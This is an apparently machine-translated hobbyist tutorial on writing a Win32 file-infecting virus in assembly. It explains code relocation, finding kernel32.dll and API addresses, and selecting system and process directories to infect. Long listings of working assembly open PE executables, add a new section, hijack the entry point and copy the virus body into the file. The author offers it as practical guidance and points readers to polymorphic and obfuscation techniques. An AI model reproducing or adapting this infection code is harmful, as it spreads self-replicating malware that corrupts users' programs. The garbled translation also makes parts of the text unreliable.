Write your own virus

Cited: The previous days to learn the virus this technology really ate a lot of hardships, went a lot of detours, although according to my knowledge level, the virus has been the learning content of the inevitable. But now I learned the introduction of this technology is actually hidden a lot of mystery, contains a lot of technology, do not specialize in research can not achieve the "cow" realm up. Now write this article, the introduction is quite practical things, can let you take a lot less detours (sometimes a mistake enough for you to find a few hours). But it takes some basic knowledge to understand. If you have enough knowledge, it will be your regret not to learn the virus. Another, because is to the association member reference, also did not write many "profession", more some more repeat.

Before you see it, you should know that this is just an article that can lead you to an entry, and if you do, you don't have to. It's best to prepare a PE watch next to it. Writing virus programs can be written in a variety of languages such as C, assembler, and even visual programming tools such as Dephi. But the most suitable for writing virus programs or assembly language. assembly language at the bottom, flexible, fast, small size advantage can be a virus program to play to the extreme, usually a program written out to thousands of bytes contains all the functions. Generally a virus has the following features:

A Code relocation

II Find the required API address yourself

Three search files, directories

Four infected files

V. Destroy the system or file (whatever you want)

One, two features are necessary, and five features are optional. The ability of a virus program to infect a file is at the heart of it and is an important criterion for measuring its quality.

(i) Relocation of the Code

A variable or function is actually a memory address, and after compiling it, the instruction in the program accesses them through the memory address of the variable or function, which is an absolute address. If you insert the code anywhere else, and then go to the address that was generated by the original compilation, you won't find it because they've moved. However, when you write the program to consider this problem, you can at the beginning of the code, put a few lines of code to get the program base address, the variables and functions as the offset address, the explicit addition of this base address can be found smoothly, this is the relocation. It's like this piece of code.

Call GetBaseAddress

Getbaseaddress:pop ebx

Sub Ebx,offset getbaseaddress

Mov Eax,dword ptr [ebx+var1]

If you use the Macro assembly language to write the virus, please try to use EBX as the base site pointer, do not use EBP, because EBP will change when invoking a function with parameters.

(ii) Get the required API address yourself

A Win32 program file, called the API function address, is populated by the system into the program file to describe the various data locations in the data structure. And the virus as a cripple is not to enjoy the treatment. Because you're inserting the virus's code into the target program, you don't get the data structure information that describes where it's stored. It was inserted into the other target program and became a disabled child with only code: (so as a crippled child, he should be self-reliant.) Search for the API address you need. The target program file contains what we need and we need to find it ourselves. As long as the target program file is still a Win32 program, its address space contains Kernel32.dll. If we find it, we can find any other stuff. The first step is to search for the base address of the Kernel32.dll. Of course, the entire address space is 4GB, and the user process space available for search is 2GB. Search in 2GB, it's scary. Can you always let the user have a cup of tea while executing the infected target program? Or a bucket landlord? Here are two tips to introduce you.

After the program is loaded, the loader invokes the location of the first instruction of the program's main thread. It uses the command is call, that is, you have not executed the program, there is a return address in the stack area, the return address points to the loader, and the loader is included in the KERNEL32.dll, we follow it up, we can find the base site of Kernel32.dll. Of course, it's not a byte-by-byte search, but a page to find. Because Win32, the starting position of the code or data is always aligned with the page units (4KB under the Windows platform). Kernel32.dll is a PE file, we are looking for a method to compare the DOS signature of PE file with the PE signature logo. There is also a way to find through she technology. This is the best way, the previous method because the stack is a dynamic cause of instability, generally can only get the address of the code block at the very beginning, this method is completely stack-independent, where the execution is not error, if your virus needs to use some remote threading technology, it is best to use this method.

She structure, the first member points to the next SEH structure, if it is the last then its value is 0FFFFFFFFH. The second member points to the exception handler, and if it is the last she struct and is not specified, the default is the Setunhandlederexceptionfilter function address. When an exception triggers this function, a dialog box pops up asking you to send an error. A blue screen is displayed under 98. This function is included in the KERNEL32.dll, as long as it gets its address up to find the base site of KERNEL32.dll. She's never going to forget about her. Teb,teb is the thread-related data structure that is allocated when a thread is created, she is just the first data-structure body at the beginning of it. It also contains a lot of other important things, teb by the FS segment selector point, interested in the search data, the reason for this space is no longer said. Next up, see how to find the Setunhanderexceptionfilter function address. First, according to the value of the "next" she structure to the last she structure, then take out she processing function address, is the Setunhandleredeceptionfilter function address, the page for the unit up to find Kernel32.dll.

After getting the base address of the Kernel32.dll, locate its export table, find out the GetProcAddress address and then use GetProcAddress to find any other required functions. In the search API should pay attention to the name of the API, API name of the actual export name is probably not the name you call, many APIs under Windows have two versions of the ANSI and Unicode version, the ANSI version of the function name suffix with a, such as Createwindowexa , and the Unicode version of the function name with a w suffix, such as CREATEWINDOWEXW. However, given the problem, many existing compilers do not allow you to write suffixes, but at the time of compiling according to your program is the ANSI version or the Unicode version of the automatic name change. Win2K Subsequent API functions are Unicode versions, if you call the ANSI version of a function, the system simply converts the string in the function into a Unicode string through the process default heap, and then calls the Unicode version of the API. Unicode is a development direction and you should develop the habit of using it rather than ANSI.

(iii) Search for files, directories

The main use of findfirstfile,findnextfile,findclose. These three functions are implemented. It is important to note that when searching for a string with "*. *", all the files and directories in the directory where the program files are located are obtained. What GetCurrentDirectory obtains is the current directory of the system. The latter is changed at any time with the user's operation, the former will only change with the location of the target program files. Search for directories and files that need to be infected should focus on searching the Windows installation directory (getwindowsdirectory), System directory (getsystemdirectory), current directory (GetCurrentDirectory), Of course, the current directory is also not allowed, for example, you infected QQ, QQ directory so many often use the program files, such as polyps, mail tools and so on are your plate Chinese. My favorite place of infection or in the system of the various processes in the directory, those are the most commonly used by users, my Suining virus is through the code insertion method to do this, very cumbersome, and very unstable. Often inexplicably make the inserted process at the end of insertion, although can be avoided with she, but still not much effect. I am now envisioning my next virus, then I will use PEB to enumerate the directories of each process, no longer using code to insert, will make the virus more stable, I Suining in the enumeration process using the TOOLHELP series functions so that the virus can function properly in Windows98.

(iv) Infection files

The so-called infection is to insert the code of the virus program into the target program, and then let the target program execute the code of the virus program first. As for where the code is inserted into the target program, how to get the target program to execute the inserted virus code, and when to infect what file is at the heart of the infection problem. First, discuss where the virus code is inserted into the target program to take effect.

Executable files under the Windows platform are in the format of PE, and you can consider it as two parts. The first part is the data structure describing the location of data storage, the second part is a variety of data, such as resources, code, data and so on. Therefore, to correctly insert the code into the target program file, it is necessary to read and modify the data structures in the target program files that describe the location of each type of storage. Let's calculate where our code will be inserted, and here we'll talk about the simplest way to insert it, by adding a new section area to the file.

Push EAX



Push File_attribute_normal

Push EAX

Call DWORD ptr [ebx+setfileattributes1]



Pop eax



Push NULL

Push File_attribute_normal

Push open_existing

Push NULL

Push 0

Push Generic_read or Generic_write

Push EAX

Call DWORD ptr [ebx+ CreateFile1]



inc EAX

JZ @error1


Dec eax

mov DWORD ptr [ebx+hfile],eax

The above steps do not need to say more, is to open the file! The file name pointer is placed inside the EAX.



Push NULL

Push DWORD ptr [ebx+hfile]

Call DWORD ptr [ebx+getfilesize1]



mov DWORD ptr [ebx+dwfilesize],eax



Push NULL

Push 0

Push 0

Push Page_readwrite

Push NULL

Push DWORD ptr [ebx+hfile]

Call DWORD ptr [ebx+createfilemapping1]

or Eax,eax

JZ @error1

mov DWORD ptr [ebx+hmap],eax

Push 0

Push 0

Push 0

Push File_map_read or File_map_write

Push DWORD ptr [Ebx+hmap]

Call DWORD ptr [Ebx+mapviewoffile1]

or Eax,eax

JZ @error1

mov DWORD ptr [ebx+pmap],eax

MOV esi,eax

CMP WORD ptr [esi], ' ZM '

JNZ @error1

Add Esi,dword ptr [esi+3ch]

CMP WORD ptr [esi], ' EP '

JNZ @error1

CMP DWORD ptr [esi+4ch], ' 1.NS '

JZ @error1

These steps are to map the file, and then determine if the file is not a PE format file, is it already infected? If these two conditions have a satisfaction it means that there is no need to infect it, jump to @error1 up.



mov Eax,dword ptr [ebx+dwfilesize]



Add Eax,virus_end-virus_start

mov Ecx,dword ptr [esi+3ch]

Call ALIGN1

Just get the size of the file, now add it to the size of the virus, then file alignment, note that file alignment is a must. ALIGN1 is a subassembly program, the aligned value is placed in the eax, and the alignment factor is placed in the ECX.

Speaking of which I came again, I began to see the tutorial, this article about the alignment method has errors, I did not realize that once for this mistake wasted 3 all night I was almost lost confidence. This error is the alignment, the so-called alignment is the multiplication of one number (unaligned number) into another number (alignment factor) He said that the alignment method is the same, he says, first with the unaligned number is removed to the alignment factor, and then the alignment factor minus the remainder, and then the number of unaligned plus the minus. I began to test a few values are correct, and most of the files can be correctly infected, but there are a few files infected with the problem. Later found to be the problem of file alignment, so change a more logical easy to figure out the way, an unaligned number is always a multiple of the alignment factor, we first find the unaligned number is several times the alignment factor, so the number of unaligned is divided by the alignment factor, if the remainder of the explanation is not aligned, also one times, the quotient of one multiplied by the alignment factor , so you get the alignment value. If the alignment factor itself is larger than the original number, then the remainder, plus a multiply the alignment factor, is one of the alignment factor, so this method is both simple and logical. That's the way it is. But I didn't really blame Billy Belceb because he was 16 years old when he wrote the E-tutorials. 16-year-old can write such a depth of the article is commendable. Admire ~ ~ ~.

mov DWORD ptr [ebx+dwfilesize],eax

Push DWORD ptr [Ebx+pmap]

Call DWORD ptr [Ebx+unmapviewoffile1]

Push DWORD ptr [Ebx+hmap]

Call DWORD ptr [Ebx+closehandle1]

Push 0

Push DWORD ptr [ebx+dwfilesize]

Push 0

Push Page_readwrite

Push 0

Push DWORD ptr [ebx+hfile]

Call DWORD ptr [ebx+createfilemapping1]

or Eax,eax

JZ @error1

mov DWORD ptr [ebx+hmap], eax

Push 0

Push 0

Push 0

Push File_map_read or File_map_write

Push DWORD ptr [Ebx+hmap]

Call DWORD ptr [Ebx+mapviewoffile1]

or Eax,eax

JZ @error1

mov DWORD ptr [ebx+pmap],eax

Remap all file views against the file according to the new file size after alignment. At this point, the size of the file on the disk also increases accordingly.

MOV esi,eax Add Esi,dword ptr [esi+3ch] The following two lines of code to ensure that the infected program running under XP will not pop up a DLL can not load the error dialog box!! When I do not know, I have written a low-level virus, the virus can infect many files. I thought that was the virus infection, but one day, I found that after the virus infected Notepad program is not available, always prompt "Illegal Win32 program" I wrote the virus again, changed the code some, but still no effect. I am very disappointed to read articles on the Internet to play. Inadvertently saw an article of Lao Luo, where he wrote a special note grateful to a person who helped him in the technology, pointed out that XXX should clear 0. It seems that he has encountered this problem, I add his code to my program, the miracle found that can be normal infection. I later looked up a lot of information and didn't find out what the structure was, only that it was the 11th member of the Image_data_directory. Push 0 Pop [Esi+image_nt_headers. Optionalheader.datadirectory (88)] mov Ecx,dword ptr [esi+74h] SHL ecx,3 XOR Edx,edx Lea EDI,[ECX+ESI+78H] Movzx eax,word ptr [esi+6h] Imul eax,eax,28h Add Edi,eax; Navigate to the end of the last section ; Start populating the new section structure body This code is very simple to navigate to the end of the section table, the last section. You may be able to use Sizeofheader plus numberofsection* section size 28h but I still compare the method I'm using now. The reason is sure compatibility is much better, my method is to get the number of image_data_directory multiplied by its size in addition to the remaining size of the other head. Plus the number of section tables * Section size 28h. There are many viruses that are used in this way. Why? I think windows will probably expand the number of Image_data_directory members in the future. So it's better to get it dynamically. Well, now that EDI is pointing to the end of the section table, it is now the site of the newly added section: (Give it a quick fill of our section table.) mov DWORD ptr [edi], ' 1ns ' mov DWORD ptr [edi+8],virus_end-virus_start Here is the name of the section SN1 (this field has 8 bytes yo), and give virtual size (some place called physical size) my virus size value, this value does not need to be aligned. When it comes to alignment, it's clear that one concept is to align the data sections in memory with the data files in the file. mov Ecx,dword ptr [esi+38h] mov Eax,dword ptr [edi-28h+0ch] Add Eax,dword ptr [edi-28h+8h] mov Ecx,dword ptr [esi+38h] Invoke ALIGN1 mov DWORD ptr [edi+0ch],eax Once the section is aligned, the virtual address member of the section is assigned a value in memory when the section is loaded into memory. The method is to get the starting address of the previous section plus the unaligned size of the previous section, which is also the section alignment of the virtual size. mov Ecx,dword ptr [esi+3ch] MOV Eax,virus_end-virus_start Invoke ALIGN1 mov DWORD ptr [edi+10h],eax Now we should give a value to the sizeofrawdata of the festival. This field is the size of the knuckles in the file, must be file-aligned, well, we get the virus size, the file is aligned after the line mov Eax,dword ptr [edi-28h+10h] Add Eax,dword ptr [edi-28h+14h] mov DWORD ptr [edi+14h],eax There's another section. The value that is offset in the file is called Pointertorawdata, which is calculated by the sizeofrawdata of the previous section plus the pointertorawdata of the previous section. Why is it? Make your own skull. It's useless to learn to stay in the skull. mov DWORD ptr [edi+24h],0e00000e0h This field is best understood, the member name is characteristics Chinese meaning is the attribute. Have readable, readable writable, executable, shareable and so on, a few of the more important properties I listed, which can be shared is more difficult to understand, to tell, can be shared properties can let the section of the data or code to reject the write-time copy (copy on write), what is a write-time copy, For example, Notepad has 10 instances running, Windows will give the same program to allocate 10 of the same size of process space, Microsoft is not so silly, he to save memory using a technology called write-time copy. 10 Notepad simultaneously runs the 10 Notepad process space mapping to 1 identical physical memory, when a notepad wants to write to the inside, the data changes completely, it will affect the other 9 Notepad, but with the write-time copy technology interference, to the Notepad that writes the data to allocate additional block memory, The newly allocated physical memory is mapped to the process space address written by Notepad, and the original data is copied into the new memory, so that it is written in the new memory, and happy to write nothing will affect the other processes. If you don't understand it, take a look at the section "Windows core Programming" memory management. Back to our infection problem, if your section has a shared attribute, it means that it rejects the copy-on-write technology, which is the notepad that writes the data, will affect the other 9 Notepad, if this is a variable, it is 10 Notepad can affect the global or called shared variables. mov Eax,dword ptr [edi+0ch] Add Eax,start-virus_start The above two lines of code is the code entry point of the virus to calculate the first useful, the calculation method is simple, is my virus began to execute the place of the label start minus the virus began the place marking Virus_start, you may be a little bit not understand, this is because the virus started where is not where I virus began to execute code, I have a large piece of data in front of the place where the virus starts executing code, which is also included in the code snippet. That means my virus has only one section. Text. (Code section is called.) Text)- Push DWORD ptr [esi+28h] Pop DWORD ptr [Ebx+oldip] Save the original code entry point of the destination file, this is an offset, if you really want to jump back to the original code entry point can not only execute Addressofentrypointer (the original code entry point pointer), but also add a imagebase member to jump, otherwise it is tantamount to make your virus suicide. Why? Because Addressofentrypointer is an offset, the number is small, a jump is likely to jump to more than 2GB of system process space, you see Microsoft Rao you do not. Unless you use she. Push EAX Pop DWORD ptr [esi+28h] Now the code entry point address of the virus that was calculated in the previous step is added with the value of the offset address of this section to the virtual address member, which is filled in. Why should I add two offsets? Because your skull doesn't turn: ( ; Calculate a new Sizeofimage MOV Eax,virus_end-virus_start Add Eax,dword ptr [esi+50h] mov Ecx,dword ptr [esi+38h] Invoke ALIGN1 mov DWORD ptr [esi+50h],eax This sizeofimage member does not make very deadly yo! Windows2000 This value a little bit less Zieho on the farewell. Many people have eaten in this place, FT. This value means the size of the entire executable after it is mapped in memory. It would be nice to add your new size plus the original sizeofimage through the section. If you're infected with a file that doesn't work, first look at the problem. Inc WORD PTR [esi+6h] A section has just been added and now adds a value of numberofsection Push DWORD ptr [esi+34h] Pop DWORD ptr [ebx+oldbase] Gets the memory base address at which the program file runs. Our virus used a relocation, not to use it, but we have to jump back to the original program file code entry point to continue to execute, it is necessary to use it, the previous has been said very clearly. mov Eax,dword ptr [edi+10h]; Get file offset Add Eax,dword ptr [edi+14h]; plus file size, hehe, file offset to increase small, but also the last section, smart you may have thought of, this is clearly the end of the file, this east to stay behind. and DWORD ptr [ebx+isinject],0; This value does not matter, this is a flag variable that I used to insert other processes. Push EAX mov DWORD ptr [esi+4ch], ' 1.NS ' MOV Ecx,virus_end-virus_start mov Edi,dword ptr [edi+14h] Add Edi,dword ptr [Ebx+pmap] Lea Esi,[ebx+virus_start] Rep MOVSB The main function of the above code is to write the virus code in the location pointed to by the pointertorawdata of our newly added section. Push DWORD ptr [Ebx+pmap] Call DWORD ptr [Ebx+unmapviewoffile1] Push DWORD ptr [Ebx+hmap] Call DWORD ptr [Ebx+closehandle1] Close the memory map file, do not understand to review win32api go. Pop eax Push File_begin Push 0 Push EAX Push DWORD ptr [ebx+hfile] Call DWORD ptr [Ebx+setfilepointer1] Moves the file pointer from the beginning of the file to the end of the new file. Push DWORD ptr [ebx+hfile] Call DWORD ptr [Ebx+setendoffile1] Set the position of the file pointer to the end position, (actually resizing the file) Why do you do this? Because at the beginning I changed the file size to the original file size + misaligned virus size When I mapped the file. However, this size is not correct, it should be the original file size + the size of the virus, so I called a function again to change the end of the file to the pointertorawdata+sizeofrawdata of my new section, equivalent to the size of the original file size + Sizeofrawdata Sizeofrawdata member is the size of the virus, of course, you can start with the original file size + virus-aligned size mapping, so better, less calls a few functions. I'm going to make a big makeover on my next version of the virus, so the garbage code won't come back. @error1: Push DWORD ptr [ebx+hfile] Call DWORD ptr [Ebx+closehandle1] Close the file, and the file changes smoothly. Push DWORD ptr [Ebx+pmap] Call DWORD ptr [Ebx+unmapviewoffile1] Push DWORD ptr [Ebx+hmap] Call DWORD ptr [Ebx+closehandle1] Ret Finally say a little bit, this article is very rubbish, more like my study notes, haha. Write this I admit also deepened my memory, but I hope you can through my this piece of rubbish, in learning the twists and turns of the virus technology of the way to make fewer mistakes, because I have become a scapegoat, you do not need to die again. The novice in the virus to write a program to make mistakes is very scary, perhaps fatal, because almost no one to talk about, and this error is often not the program's grammatical error is so simple, you need to complete the analysis, a comprehensive understanding of the system, in order to quickly locate the error. I've made many mistakes, and many mistakes are "low-level" mistakes made during the night. I've wasted a lot of commissioning time, FT. In addition, the article does not speak so many clever techniques, because I am also in the exploration. Everyone learned the content of this article, you can look at the entry point Blur technology, polymorphic infection engine technology, virtual machine technology. Simple and practical techniques for how to infect files without changing file size, PEB and TEB structures, code insertion techniques. The more you learn, the more you need to assemble your skills, you should be able to improve your technology while also learning some of the knowledge of compilation, such as the protection mode programming, some instruction set such as MMX. The knowledge described above, I only know a little bit, I am also a broiler. There are still a lot of books to look at in the future, 88.

Write your own virus